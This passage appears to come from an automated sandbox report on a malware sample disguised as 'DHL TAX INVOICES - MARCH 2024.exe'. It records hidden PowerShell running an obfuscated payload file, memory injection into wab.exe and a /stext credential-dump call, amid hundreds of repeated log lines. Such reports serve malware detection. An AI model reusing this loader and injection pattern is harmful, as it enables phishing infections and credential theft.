              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FAFAE0
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
